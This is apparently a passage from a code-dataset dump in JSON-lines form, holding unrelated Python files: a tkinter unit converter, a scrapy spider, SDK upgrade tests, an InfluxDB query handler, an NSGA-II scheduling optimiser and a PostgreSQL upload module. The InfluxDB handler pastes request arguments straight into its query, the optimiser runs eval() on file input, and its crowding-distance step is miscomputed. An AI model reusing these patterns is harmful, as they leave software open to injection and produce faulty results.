args.log:\n if cat == 'all':\n pass\n else:\n enable_logging(cat)\n\n sys.argv[1:] = unknown_args\n if extendable:\n return p","sub_path":"pycfiles/fragmap-0.3.1-py3.6/debug.cpython-36.py","file_name":"debug.cpython-36.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"541646803","text":"import tkinter\nfrom tkinter import ttk\nimport unit_manager\nimport converter\n\nclass app (tkinter.Tk):\n\tdef __init__(self, parent, units, converter):\n\t\ttkinter.Tk.__init__(self, parent)\n\t\tself.units = units\n\t\tself.con = converter\n\t\tself.parent = parent\n\t\tself.initialize()\n\n\tdef initialize(self):\n\t\tself.grid()\n\n\t\tself.unitGroupVar = tkinter.StringVar()\n\t\tself.groupCombo = ttk.Combobox(self, textvariable=self.unitGroupVar, values=self.units.getGroupsList(), justify=tkinter.CENTER, state=\"readonly\")\n\t\tself.groupCombo.current(0)\n\t\tself.groupCombo.bind(\"<>\", lambda event: self.setGroup(self.unitGroupVar.get(), event))\n\t\tself.groupCombo.grid(row=0, column=0, columnspan=2, sticky=\"EW\")\n\n\t\tself.inUnitVar = tkinter.StringVar()\n\t\tself.inUnitCombo = ttk.Combobox(self, textvariable=self.inUnitVar, values=self.units.getUnitsList(self.unitGroupVar.get()), justify=tkinter.CENTER, state=\"readonly\")\n\t\tself.inUnitCombo.current(0)\n\t\tself.inUnitCombo.bind(\"<>\", self.resetValues)\n\t\tself.inUnitCombo.grid(row=1, column=0, sticky=\"EW\")\n\n\t\tself.outUnitVar = tkinter.StringVar()\n\t\tself.outUnitCombo = ttk.Combobox(self, textvariable=self.outUnitVar, values=self.units.getUnitsList(self.unitGroupVar.get()), justify=tkinter.CENTER, 
state=\"readonly\")\n\t\tself.outUnitCombo.current(0)\n\t\tself.outUnitCombo.bind(\"<>\", self.resetValues)\n\t\tself.outUnitCombo.grid(row=1, column=1, sticky=\"EW\")\n\n\t\tself.inValueVar = tkinter.DoubleVar()\n\t\tself.inValueEntry = tkinter.Entry(self, textvariable=self.inValueVar, justify=tkinter.CENTER)\n\t\tself.inValueEntry.bind(\"\", self.convert)\n\t\tself.inValueEntry.grid(row=2, column=0, sticky=\"EW\")\n\n\t\tself.outValueVar = tkinter.DoubleVar()\n\t\toutValueLabel = tkinter.Label(self, textvariable=self.outValueVar, justify=tkinter.CENTER)\n\t\toutValueLabel.grid(row=2, column=1, sticky=\"EW\")\n\n\t\tcalculateButton = tkinter.Button(self, text=\"Calculate\", command=self.convert)\n\t\tcalculateButton.grid(row=3, column=0, columnspan=2, sticky=\"EW\")\n\n\t\tself.columnconfigure(0, weight=1)\n\t\tself.columnconfigure(1, weight=1)\n\t\tself.resizable(True, False)\n\t\tself.update()\n\t\tself.geometry(self.geometry())\n\t\tself.minsize(self.winfo_width(), self.winfo_height())\n\n\tdef setGroup(self, var, evt):\n\t\tself.inUnitCombo.configure(values=self.units.getUnitsList(self.unitGroupVar.get()))\n\t\tself.outUnitCombo.configure(values=self.units.getUnitsList(self.unitGroupVar.get()))\n\t\tself.inUnitCombo.current(0)\n\t\tself.outUnitCombo.current(0)\n\t\tself.resetValues(None)\n\n\tdef resetValues(self, evt):\n\t\tself.inValueVar.set(0.0)\n\t\tself.outValueVar.set(0.0)\n\n\tdef convert(self, evt=None):\n\t\ttry:\n\t\t\tself.inValueEntry.configure(foreground=\"black\")\n\t\t\tvalue = self.inValueVar.get()\n\t\t\tself.outValueVar.set(self.con.convert(value, self.inUnitVar.get(), self.outUnitVar.get()))\n\n\t\texcept ValueError:\n\t\t\tself.inValueEntry.configure(foreground=\"red\")\n\t\t\tself.outValueVar.set(0.0)\n\nif __name__ == \"__main__\":\n\tmanager = unit_manager.unit_manager()\n\tcon = converter.converter(manager)\n\tapp = app(None, manager, con)\n\tapp.title(\"Unit Calculator\")\n\tapp.mainloop()","sub_path":"Python/Unit Calculator/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"549438838","text":"import scrapy\nfrom bs4 import BeautifulSoup, Comment\nimport re\n\nclass NewsSpider(scrapy.Spider):\n\n name = 'news'\n start_urls = ['http://racc.edu/News/default.aspx']\n\n def parse(self, response):\n\n # Beatifulsoup takes over the complete response html\n soup = BeautifulSoup(response.text, 'lxml')\n content = soup.find(id=\"content\")\n\n # remove html comments from it.\n for child in content:\n if isinstance(child, Comment):\n child.extract()\n\n x = 0\n\n articles = content.findAll('article')\n articles.reverse()\n\n for art in articles:\n\n body = art.span\n if body is None:\n body = ''\n else:\n pattern = re.compile(r'\\s+')\n body = \"\".join(str(item) for item in body.contents)\n body = re.sub(pattern, ' ', body).strip()\n\n x += 1\n\n yield {\n 'id': x,\n 'title': art.h2.get_text(),\n 'excerpt': art.p.get_text(),\n 'body': '
<p>' + art.p.get_text() + '</p>
' + body\n }","sub_path":"racc/scrapper/spiders/news_scrapy.py","file_name":"news_scrapy.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"240410648","text":"import subprocess\n\nimport pytest\n\nfrom briefcase.exceptions import BriefcaseCommandError\n\n\ndef test_upgrade(mock_sdk):\n \"sdkmanager can be used to upgrade the Android SDK\"\n mock_sdk.upgrade()\n\n mock_sdk.command.subprocess.run.assert_called_once_with(\n [str(mock_sdk.sdkmanager_path), \"--update\"],\n env=mock_sdk.env,\n check=True,\n )\n\n\ndef test_upgrade_failure(mock_sdk):\n \"If sdkmanager fails, an error is raised\"\n mock_sdk.command.subprocess.run.side_effect = subprocess.CalledProcessError(1, \"\")\n with pytest.raises(BriefcaseCommandError):\n mock_sdk.upgrade()\n\n mock_sdk.command.subprocess.run.assert_called_once_with(\n [str(mock_sdk.sdkmanager_path), \"--update\"],\n env=mock_sdk.env,\n check=True,\n )\n","sub_path":"tests/integrations/android_sdk/AndroidSDK/test_upgrade.py","file_name":"test_upgrade.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"437305009","text":"from controllers.tag import parse_tag_string\nimport json\nimport logging\nfrom database.influxdb import db\n\nfrom .default import DefaultRequestHandler\n\n\nclass DataRequestHandler(DefaultRequestHandler):\n async def get(self, database: str, measurement: str):\n db.switch_database(database)\n\n fields_string = self.get_argument('fields')\n tags_string = self.get_argument('tags')\n init_dt = self.get_argument('init_dt', None)\n end_dt = self.get_argument('end_dt', None)\n group_by = self.get_argument('group_by_time', None)\n\n group_by_str = ''\n if group_by is not None:\n group_by_str = f'GROUP BY time({group_by})'\n fields = parse_tag_string(fields_string)\n fields_str = ', '.join(\n [f'{v}(\"{k}\") AS \"{v}_{k}\"' for k, v in fields.items()])\n else:\n fields_str = ', '.join(fields_string.split(','))\n\n tags = parse_tag_string(tags_string)\n tags_str = \"(\" + \" AND \".join(\n [f'\"{k}\"' + f\"='{v}'\" for k, v in tags.items()]) + \")\"\n\n if init_dt is None and end_dt is None:\n time_str = f\"time > now() - 1h\"\n else:\n time_str = f\"time >= '{init_dt}' AND time < '{end_dt}'\"\n\n query = (f\"SELECT {fields_str} \"\n f' FROM \"{database}\".\"autogen\".\"{measurement}\" '\n f\" WHERE {time_str} AND {tags_str}\"\n f\" {group_by_str}\")\n\n print(query)\n res = db.query(query)\n res = list(res.get_points())\n self.write(json.dumps(res))\n","sub_path":"controllers/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"122403085","text":"import math\nimport random\nimport sys\nimport copy\nimport matplotlib.pyplot as plt\nfrom abc import ABCMeta, abstractmethod\nfrom typing import TypeVar, Generic, List\nimport numpy as np\nfrom plotly.validators.surface.contours.x import project\n\n\"\"\" Important parts on MOCell:\n S: Number of Skills\n T: Number of Tasks\n E: Number of Employees\n Solution class object: makes a 2-dimensional employee allocation matrix and saves each employee's working hours for each task. Its form is a 1-dimensional array with size T * E. 
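(As a worked illustration, assuming a row-major, task-major flattening, which is an assumption of this note rather than something stated in the code: with T = 3 tasks and E = 2 employees, employee e's dedication to task t would sit at flat index t * E + e, so index 2 * 2 + 1 = 5 would hold employee 1's hours on task 2.) 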
It also saves the size T * E and the location (the index of the individual).\n SBX crossover: Implemented that operator\n Mutation: change 1 variable among T*E elements in the employee allocation matrix for 2 offspring genes\n Selecting parent: pick 2 among the 8 neighbors of the current population. Neighbor doesn't occur after that in the remaining evaluation cycle.\n crossover: define SBX operator and apply execute function to the parents and put them into the offspring\n Solve TPG: ...\n Replacement on the current population: replacing the individual's parameter (employee allocation matrix) by offspring[0]'s one after comparing fitness of the original one and the offspring[0] (and add that offspring[0] to archive) (Note that picking individual from current population is done by shallow copy (referencing), not by deep copy (which should be copied by copy.deepcopy(nameOfObject)).\n\n Changes to adapt to NSGA-II:\n - do non-dominated sort on initial population based on the fitness. (Note that pareto-front on single-objective task is just a sorting)\n - Assign crowding distance : non needed for single object task, but if it becomes MO, do that\n - Selection for crossover/mutation: use crowded comparison operator for binary tournament selection - select currentPopulation times. (Find other implementations)\n - crossover: do on the offspring by SBX\n - mutation:\n - recombination: pick the best currentPopulation genes (it performs non-dominated sort and crowding distance computation), and go to the selection process.\n \"\"\"\n\n#####################instance_generator.py###############################3\nclass Task(object):\n \"\"\"docstring for Task\"\"\"\n def __init__(self, taskId, cost, skills):\n super(Task, self).__init__()\n self.taskId = taskId\n self.cost = cost\n self.skills = skills\nclass Employee(object):\n \"\"\"docstring for Employee\"\"\"\n def __init__(self, employeeId, salary, skills, team):\n super(Employee, self).__init__()\n self.employeeId = employeeId\n self.salary = salary\n self.skills = skills\n self.team = team\n\n'''\n# randomize the number of skills between 5 and 10 inclusively\nS = random.randint(7,10)\n\n# randomize the number of tasks between 5 and 10 inclusively\nT = random.randint(5,10)\n\ntasks = []\n\n# generate tasks\nfor i in range(1, T+1):\n # sample a cost from a normal distribution with mu=10 and std=5\n cost = round(np.random.normal(10,5))\n\n skills = []\n\n # randomize number of skills required for this task\n numSkills = random.randint(2,3)\n\n\n # randomize skills for this task\n for j in range(numSkills):\n r = random.randint(1, S)\n # remove duplication\n while (r in skills):\n r = random.randint(1, S)\n skills.append(r)\n\n # maintain the skill list as sorted\n skills.sort()\n # add task instance to task list\n tasks.append(Task(i, cost, skills))\n\n# randomize the rate of edge/task in the Task Precedence Graph\nevRate = np.random.normal(1.5,0.5)\nnumEdge = round(evRate * float(T))\n\nTPG = []\ncountEdge = 0\n\n# randomize a number of edges (a, b) in which a < b\nwhile countEdge != numEdge:\n a = random.randint(1,T-1)\n b = random.randint(a+1,T)\n\n # dont add the edge into TPG if its already in there (avoid overlaps)\n if (a,b) not in TPG:\n TPG.append((a,b))\n countEdge += 1\n\n# randomize number of employees\nE = random.randint(10,15)\nemployees = []\n\n# randomize the salary and skills for each employees\nfor i in range(1,E+1):\n salary = round(np.random.normal(10000,1000))\n skills = []\n team = [None]*E\n\n numSkills = 
random.randint(6,7)\n # because of the malicious usage of i, append operation inserted the wrong i for the Employee object. Changed from i to j.\n for j in range(numSkills):\n r = random.randint(1,S)\n # remove duplication\n while (r in skills):\n r = random.randint(1,S)\n skills.append(r)\n for k in range(1, E+1):\n if k < 1:\n team[k-1] = employees[k-1].team[i-1]\n else:\n team[k-1] = random.random() * 2\n\n # maintain the skill list as sorted\n skills.sort()\n employees.append(Employee(i, salary, skills, team))\n'''\n\n# set the number of objectives (fitnesses)\nnum_objectives = 1\nS = 0 # number of skills. Measure by the maximum value extracted from skillList\nT = 0 # number of tasks\ntasks = [] # task list\nnumEdge = 0 # number of edges in TPG\nTPG = [] # TPG list\nE = 0 # number of employees\nemployees = [] # employees\n\n''' file IO data '''\n# task data\ncostList = []\nskillList = []\n# employee data\nsalaryList = []\nemployeeSkillList = []\nteamList = []\n# TPG data\ntpgEdges = []\n\n''' file IO '''\nwith open(sys.argv[1], 'r') as input:#, open(sys.argv[2], 'w') as output:\n # Task \\n Skills\n input.readline()\n input.readline()\n for line in input:\n if not line.strip():\n break\n skill = eval(line.strip())\n for sn in skill:\n if S < sn:\n S = sn\n skillList.append(skill)\n T += 1\n\n # Cost\n input.readline()\n for line in input:\n if not line.strip():\n break\n costList.append(float(line.strip()))\n\n # Employee \\n Skills\n input.readline()\n input.readline()\n for line in input:\n if not line.strip():\n break\n employee = eval(line.strip())\n for sn in employee:\n if S < sn:\n S = sn\n employeeSkillList.append(employee)\n E += 1\n\n # Salary\n input.readline()\n for line in input:\n if not line.strip():\n break\n salaryList.append(float(line.strip()))\n\n # Team\n input.readline()\n for line in input:\n if not line.strip():\n break\n team = eval(line.strip())\n teamList.append(team)\n\n # generate tasks\n for i in range(1, T+1):\n tasks.append(Task(i, costList[i-1], skillList[i-1]))\n\n # put employee information\n for i in range(1,E+1):\n employees.append(Employee(i, salaryList[i-1], employeeSkillList[i-1], teamList[i-1]))\n\n # TPG\n input.readline()\n tpgEdges = eval(input.readline().strip())\n numEdge = len(tpgEdges)\n TPG = tpgEdges\n\n '''\n for skill in skillList:\n output.write(str(skill))\n output.write(\"\\n\".join(map(str, costList)))\n for employee in employeeList:\n output.write(str(employee))\n output.write(\"\\n\".join(map(str, salaryList)))\n for team in teamList:\n output.write(str(team))\n output.write(\"\\n\".join(map(str, tpgEdges)))\n '''\ninput.close()\n# output.close()\n\nif __name__ == \"__main__\":\n for t in tasks:\n print(t.taskId, t.cost, t.skills)\n for ed in TPG:\n print(ed)\n for e in employees:\n print(e.employeeId, e.salary, e.skills)\n\n#####################instance_generator.py###############################3\n\nS = TypeVar('S')\nR = TypeVar('R')\nclass Operator(Generic[S, R]):\n \"\"\" Class representing operator \"\"\"\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def execute(self, source: S) -> R:\n pass\n\n @abstractmethod\n def get_name(self) -> str:\n pass\n\nclass Solution(Generic[S]):\n \"\"\" Class representing solutions \"\"\"\n\n __metaclass__ = ABCMeta\n\n def __init__(self, number_of_objectives: int, number_of_variables: int, variables: List[float], identifier):\n '''\n Constructor. 
Parameters:\n number_of_variables\n variables: time (in hour) that each employee has been allocated for that hour for such task\n Other elements:\n rank: rank for NSGA-II\n distance: distance for crowding-distance\n '''\n self.number_of_objectives = number_of_objectives\n self.number_of_variables = number_of_variables\n self.lower_bound=[0.0 for _ in range(self.number_of_variables)]\n self.upper_bound =[1.0 for _ in range(self.number_of_variables)]\n\n self.objectives = [0.0 for _ in range(self.number_of_objectives)]\n self.variables = variables\n self.attributes = {}\n self.rank = sys.maxsize\n self.distance = 0.0\n self.identifier=identifier\n\n def __copy__(self):\n '''\n Copying operator\n '''\n new_solution = Solution(\n self.number_of_objectives,\n self.number_of_variables, self.variables, self.identifier)\n new_solution.objectives = self.objectives[:]\n new_solution.rank = self.rank\n new_solution.distance = self.distance\n\n return new_solution\n\n def evaluate(self):\n\n fitness=[]\n object = self\n\n undt =0\n for i in range(T):\n k=0\n for j in range(E):\n k=k+object.variables[i*E+j]\n\n if k==0:\n undt=undt+1\n\n reqsk=0\n for i in tasks:\n s = set([])\n for j in employees:\n if object.variables[(i.taskId-1)*E+j.employeeId-1]>0:\n s = s.union(set(j.skills))\n\n s = set(i.skills)-s\n\n reqsk = reqsk+len(s)\n\n\n\n solvable= 1\n projectduration=0\n unfinished = copy.deepcopy(tasks)\n\n TPG2 = copy.deepcopy(TPG)\n totaloverwork=0\n while (TPG2)!=0:\n V=[]\n depended = []\n for tpg in TPG2:\n if tpg[1] not in depended:\n depended.append(tpg[1])\n\n for f in unfinished:\n if f.taskId not in depended:\n V.append(f)\n overwork=0\n\n if (len(V)==0):\n solvable=0\n break\n dedication=[]\n\n ratio=[]\n dedicationj=[]\n # i=0\n efficiency=0\n for v in V:\n d=0\n for e in employees:\n ded = object.variables[(v.taskId-1)*E+e.employeeId-1]\n dedication.append(ded)\n d = d+ded\n if d==0:\n solvable=0\n break\n dedicationj.append(d)\n\n\n ratio.append(v.cost/d)\n # i=i+1\n\n for e in employees:\n dedsum=0\n for p in V:\n dedsum = dedsum+object.variables[(p.taskId-1)*E+e.employeeId-1]\n if dedsum>1:\n overwork=overwork+dedsum-1\n\n t = min(ratio)\n projectduration = projectduration+t\n i=0\n deleted=[]\n if solvable==0:\n break\n for j in V:\n for un in unfinished:\n if un.taskId == j.taskId:\n un.cost = un.cost - t*dedicationj[i]\n if un.cost<=0.000001:\n deleted.append(j.taskId)\n\n i=i+1\n totaloverwork = totaloverwork +overwork*t\n\n\n for j in unfinished:\n if j.taskId in deleted:\n del unfinished[unfinished.index(j)]\n for tpg in TPG2:\n if (tpg[0] in deleted) or (tpg[1] in deleted):\n del TPG2[TPG2.index(tpg)]\n\n\n projectcost=0\n tkj=[]\n Pei=[]\n for task in tasks:\n #sum=0\n efficiency=0\n #for employee in employees:\n # sum=sum+object.variables[(task.taskId-1)*E+employee.employeeId-1]\n ratio_sum = 0\n for em in range(0,E-1):\n for em2 in range(em,E):\n num = 0\n for sk in task.skills:\n if sk in employees[em].skills or sk in employees[em2].skills:\n num = num + 1\n efficiency = efficiency + employees[em].team[em2]*num/len(task.skills)\n ratio_sum = ratio_sum + num/len(task.skills)\n\n #tkj.append(task.cost/(sum*ration_sum))\n tkj.append(task.cost*efficiency/(2*ratio_sum))\n for employee in employees:\n Pei.append(employee.salary)\n for employee in employees:\n for task in tasks:\n projectcost = projectcost+object.variables[(task.taskId-1)*E+employee.employeeId-1]*tkj[task.taskId-1]*Pei[employee.employeeId-1]\n\n q=projectcost*0.000001+projectduration*0.1\n 
r=100+10*undt+10*reqsk+0.1*totaloverwork\n\n\n if undt > 0.001 or reqsk > 0.001 or totaloverwork>1:\n fitness.append(1/(q+r))\n else:\n fitness.append(1/q)\n\n self.objectives[0] = fitness[0]\n # evaluate solution and update objective values.\n\n '''\n def crossover(self, other):\n # crossover using such operator\n raise NotImplementedError(\"Solution class have to be implemented\")\n '''\n\n '''\n def mutate(self):\n # mutate with such mutation operator\n raise NotImplementedError(\"Solution class have to be implemented\")\n '''\n\n def __rshift__(self, other):\n '''\n True if this solution dominates the other (\">>\" operator)\n '''\n dominates = False\n for i in range(len(self.objectives)):\n if self.objectives[i] < other.objectives[i]:\n return False\n\n elif self.objectives[i] > other.objectives[i]:\n dominates = True\n\n return dominates\n\n def __lshift__(self, other):\n '''\n True if the other solution dominates this solution (\"<<\" operator)\n '''\n return other >> self\n\nclass Crossover(Operator[List[S], List[R]]):\n \"\"\" Class representing crossover operator. \"\"\"\n\n __metaclass__ = ABCMeta\n\n def __init__(self, probability: float):\n if probability > 1.0:\n raise Exception('The probability is greater than one: {}'.format(probability))\n elif probability < 0.0:\n raise Exception('The probability is lower than zero: {}'.format(probability))\n\n self.probability = probability\n\n @abstractmethod\n def execute(self, source: S) -> R:\n pass\n\nclass SBX(Crossover[Solution, Solution]):\n __EPS = 1.0e-14\n\n def __init__(self, probability: float, distribution_index: float = 20.0):\n super(SBX, self).__init__(probability=probability)\n self.distribution_index = distribution_index\n\n def execute(self, parents: List[Solution]) -> List[Solution]:\n if len(parents) != 2:\n raise Exception('The number of parents is not two: {}'.format(len(parents)))\n\n offspring = [copy.copy(parents[0]), copy.copy(parents[1])]\n rand = random.random()\n if rand <= self.probability:\n for i in range(parents[0].number_of_variables):\n value_x1, value_x2 = parents[0].variables[i], parents[1].variables[i]\n\n if random.random() <= 0.5:\n if abs(value_x1 - value_x2) > self.__EPS:\n if value_x1 < value_x2:\n y1, y2 = value_x1, value_x2\n else:\n y1, y2 = value_x2, value_x1\n\n lower_bound, upper_bound = parents[0].lower_bound[i], parents[1].upper_bound[i]\n\n beta = 1.0 + (2.0 * (y1 - lower_bound) / (y2 - y1))\n alpha = 2.0 - pow(beta, -(self.distribution_index + 1.0))\n\n rand = random.random()\n if rand <= (1.0 / alpha):\n betaq = pow(rand * alpha, (1.0 / (self.distribution_index + 1.0)))\n else:\n betaq = pow(1.0 / (2.0 - rand * alpha), 1.0 / (self.distribution_index + 1.0))\n\n c1 = 0.5 * (y1 + y2 - betaq * (y2 - y1))\n beta = 1.0 + (2.0 * (upper_bound - y2) / (y2 - y1))\n alpha = 2.0 - pow(beta, -(self.distribution_index + 1.0))\n\n if rand <= (1.0 / alpha):\n betaq = pow((rand * alpha), (1.0 / (self.distribution_index + 1.0)))\n else:\n betaq = pow(1.0 / (2.0 - rand * alpha), 1.0 / (self.distribution_index + 1.0))\n\n c2 = 0.5 * (y1 + y2 + betaq * (y2 - y1))\n\n if c1 < lower_bound:\n c1 = lower_bound\n if c2 < lower_bound:\n c2 = lower_bound\n if c1 > upper_bound:\n c1 = upper_bound\n if c2 > upper_bound:\n c2 = upper_bound\n\n if random.random() <= 0.5:\n offspring[0].variables[i] = c2\n offspring[1].variables[i] = c1\n else:\n offspring[0].variables[i] = c1\n offspring[1].variables[i] = c2\n else:\n offspring[0].variables[i] = value_x1\n offspring[1].variables[i] = value_x2\n else:\n 
offspring[0].variables[i] = value_x1\n offspring[1].variables[i] = value_x2\n return offspring\n\ndef mutation(Solution1, Solution2):\n r = random.random()\n if(r < 0.5):\n r = 1 - pow((2 * (1-r)), (1/7))\n else:\n r = pow(2*r, (1/7)) - 1\n for i in range(T*E):\n '''\n i = random.randint(0, T*E-1)/10\n j = random.randint(0,10)/10\n Solution1.variables[i] = j\n i = random.randint(0, T*E-1)/10\n j = random.randint(0,10)/10\n Solution2.variables[i] = j\n '''\n if random.random() < r:\n j = random.randint(0,5)/10.0\n Solution1.variables[i] = j\n if random.random() < r:\n j = random.randint(0,5)/10.0\n Solution2.variables[i] = j\n return [Solution1, Solution2]\n\nclass NSGA2:\n '''\n Implement parts of NSGA-II\n '''\n\n def __init__(self, num_objectives, num_variables, crossover_rate = 0.9):\n '''\n Constructor. Parameters: number of objectives, number of variables (size of the employee allocation matrix, crossover_rate (default 90%)\n '''\n self.num_objectives = num_objectives\n self.num_variables = num_variables\n self.crossover_rate = crossover_rate\n\n random.seed()\n\n def run(self, P: List[Solution], population_size, num_generations):\n # Run the NSGA-II instance\n\n for s in P:\n s.evaluate()\n\n Q = []\n\n for i in range(num_generations):\n # print(\"Iteration \", i)\n\n # combine parent and offspring\n R = []\n R.extend(P)\n R.extend(Q)\n\n fronts = self.fast_nondominated_sort(R) # front construction\n\n # print(P[0].variables)\n\n del P[:] # make parent P empty\n\n front = []\n for front in fronts.values(): # fill parent until it reaches the size\n ''' for p in front:\n print(p.variables) '''\n if len(front) == 0: # Assert the non-emptyness of the front\n break\n\n self.assign_crowding_distance(front) # assign crowding distance\n P.extend(front)\n\n # print(P[0].variables)\n\n if len(P) >= population_size:\n break\n\n self.sort_crowdingdist(P) # sort by crowding_distance\n\n if len(P) > population_size:\n del P[population_size:]\n ''' for p in P:\n print(p.identifier, p.objectives[0]) '''\n #print(\"Generation\", i)\n if True:\n # print(\"Highest fitness:\", P[0].objectives[0])\n print(P[0].objectives[0], P[len(P)-1].objectives[0])\n #print(\"Lowest fitness:\", P[len(P)-1].objectives[0])\n # print(\"Generation\", i, \": \", P[0].identifier, P[0].objectives[0])\n # print(P[0].variables)\n # print(\"Generation\", i, \": \", P[len(P)-1].identifier, P[len(P)-1].objectives[0])\n\n Q = self.make_offspring(P)\n\n def sort_objective(self, P, obj_idx):\n # sort the popoulation (or the front) by obj_idx'th objective\n P.sort(key=lambda x: x.objectives[obj_idx], reverse=True)\n\n def sort_crowdingdist(self, P):\n # sort the population (or the front) by decreasing order of crowding distance. 
note that rank order should be preserved.\n P.sort(key=lambda x:x.distance, reverse=True)\n P.sort(key=lambda x:x.rank)\n\n def make_offspring(self, P):\n # make offspring by crossover and mutation\n # selection of parents will be done by random\n Q = []\n crossover = SBX(probability=crossover_rate, distribution_index=18) # initiate crossover instance\n\n while len(Q) < len(P):\n parents = [None, None]\n\n while parents[0] == parents[1]:\n # Additionally on the random choice, select two and pick one by the order of crowded comparison operaor\n for i in range(2):\n # print(len(P))\n s1 = random.choice(P)\n s2 = s1\n while s1 is s2:\n s2 = random.choice(P)\n\n # print(\"s1: \", type(s1).__name__)\n # print(\"s2: \", type(s2).__name__)\n # select what solution is better\n selection = 0\n\n if s1.rank < s2.rank:\n selection = 1\n elif s1.rank > s2.rank:\n selection = -1\n elif s1.distance > s2.distance:\n selection = 1\n elif s1.distance < s2.distance:\n selection = -1\n else:\n selection = 0\n\n if selection > 0:\n parents[i] = s1\n else:\n parents[i] = s2\n\n if random.random() < self.crossover_rate:\n\n child = crossover.execute(parents)\n\n child = mutation(child[0], child[1])\n\n child[0].identifier = len(P) + len(Q)\n child[0].evaluate()\n Q.append(child[0])\n if len(Q) < len(P):\n child[1].identifier = len(P) + len(Q)\n child[1].evaluate()\n Q.append(child[1])\n\n return Q\n\n def fast_nondominated_sort(self, P):\n # discover pareto fronts in P based on non-domination criterion\n fronts = {}\n\n S = {} # Set of dominated instance of each instance p\n n = {} # number of dominating instance of each instance p\n for s in P: # use each instance of P as an index\n S[s] = []\n n[s] = 0\n\n fronts[1] = [] # pareto fronts will be constructed from rank 1\n\n for p in P: # with each instance p,\n for q in P: # compare each instance q for p\n if p is q: # p and q are instances of P, so is works as reference check\n continue\n\n if p >> q: # p dominates q\n S[p].append(q)\n\n elif p << q: # q dominates p\n n[p] += 1\n\n if n[p] == 0:\n p.rank = 1 # rank of this instance is 1\n fronts[1].append(p) # insert this instance to rank 1 front\n\n i = 1\n while len(fronts[i]) != 0: # see each dominated instance of each front\n next_front = []\n for p in fronts[i]:\n for q in S[p]: # find a dominates set q by p\n n[q] -= 1 # domination is recovered\n if n[q] == 0: # no other dominates q anymore\n q.rank = i + 1\n next_front.append(q)\n i += 1\n fronts[i] = next_front # fill the next front\n\n return fronts # return the front\n\n def assign_crowding_distance(self, front):\n '''\n assign a crowding distance for each solution in each front.\n note that front is called as a reference, so changing the value here affects the entire population\n '''\n for p in front:\n p.distance = 0 # distance initialize\n\n for obj_index in range(self.num_objectives):\n self.sort_objective(front, obj_index) # sort by each objective\n\n front[0].distance = front[len(front) - 1].distance = float('inf') # boundary points are always selected\n for i in range(1, len(front) - 1):\n front[i].distance += (front[i+1].distance - front[i-1].distance) # Originally added value should be devided by the difference between the maximum possible fitness value and the minimum possible fitness value, but since we will regulate fitness as smaller than 1, just ignore.\n\n\n#initialize currentpopulation\ncrossover_rate=0.9\npopulationSize=32\nmaxEvaluations=320\nsolution = []\ncurrentPopulation = []\n# currentPopulation = List[Solution]\nevaluations = 
0\n\nif __name__ == '__main__':\n # Instantiate nsga2 object\n nsga2=NSGA2(num_objectives, T*E, crossover_rate)\n for i in range(0, populationSize):\n temp=[]\n for j in range(T):\n temp2=[]\n for k in range(E):\n ded = random.randint(0,5)\n ded = ded/10.0\n temp2.append(ded)\n temp = temp+temp2\n individual = Solution(variables=temp, number_of_variables=T*E, number_of_objectives=num_objectives, identifier=i)\n currentPopulation.append(individual)\n\n # print(currentPopulation)\n\n # call NSGA-II instance\n nsga2.run(currentPopulation, populationSize, maxEvaluations)\n\n # record final fitness and variables\n print(\"Final fitness:\", currentPopulation[0].objectives[0])\n print(currentPopulation[0].variables)\n\n","sub_path":"src/nsga2-data2.py","file_name":"nsga2-data2.py","file_ext":"py","file_size_in_byte":26482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"404800673","text":"import pandas as pd\nimport logging\n\nlogger = logging.getLogger('nodes.data_storage')\n\n\ndef update(client, params):\n \"\"\"\n Upload dataframe to database in PostgreSQL.\n \"\"\"\n\n # Soap operas\n table_name = params.novelas.split('.')[0]\n\n df = params.novelas_df\n df.to_sql(table_name, con=client.conn, if_exists='replace', index=False)\n\n # Casting\n table_name = params.casting.split('.')[0]\n\n df = params.cast_df\n df.to_sql(table_name, con=client.conn, if_exists='replace', index=False)\n\n # Images\n table_name = params.features.split('.')[0]\n\n df = params.novelas_df\n df.to_sql(table_name, con=client.conn, if_exists='replace', index=False)\n\n # Feature by soap opera\n table_name = params.color_novela.split('.')[0]\n\n df = params.color_novela_df\n df.to_sql(table_name, con=client.conn, if_exists='replace', index=False)\n\n table_name = params.race_novela.split('.')[0]\n\n df = params.race_novela_df\n df.to_sql(table_name, con=client.conn, if_exists='replace', index=False)\n\n # IBGE\n table_name = params.ibge.split('.')[0]\n\n df = params.ibge_df\n df.to_sql(table_name, con=client.conn, if_exists='replace', index=False)\n\n\ndef done(client, params):\n \"\"\"\n Check whether the table exists in the database AND it is populated.\n \"\"\"\n table_name = params.ibge.split('.')[0]\n\n if client.engine.has_table(table_name):\n result = pd.read_sql(f'SELECT * FROM {table_name} LIMIT 5', con=client.conn)\n\n if result.shape[0] > 0:\n logger.info(f'Table {table_name} found in the database and it is populated. 
